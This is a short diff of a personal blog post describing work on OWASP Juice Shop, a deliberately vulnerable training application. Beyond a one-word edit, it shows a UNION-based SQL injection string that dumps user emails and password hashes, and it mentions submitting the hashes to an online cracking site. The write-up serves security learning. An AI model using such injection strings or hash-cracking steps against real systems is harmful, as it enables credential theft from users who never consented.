m4l1c3/m4l1c3.github.io/_posts/2017-01-09-juice-shop.md

 sear')) union all select id,email,password,null,null,null,null,'qzzjq'||'QHWDqQappkdzrcmfZObclJekqtZryURacjvmYOqV'||'qaakq' from users-- IvXq

-Bam, a list of users and their hashed passwords, another challenge completed.
+A list of users and their hashed passwords, another challenge completed.

 Now to try and figure out some of these passwords.
 I put the hashes all into this site: https://crackstation.net/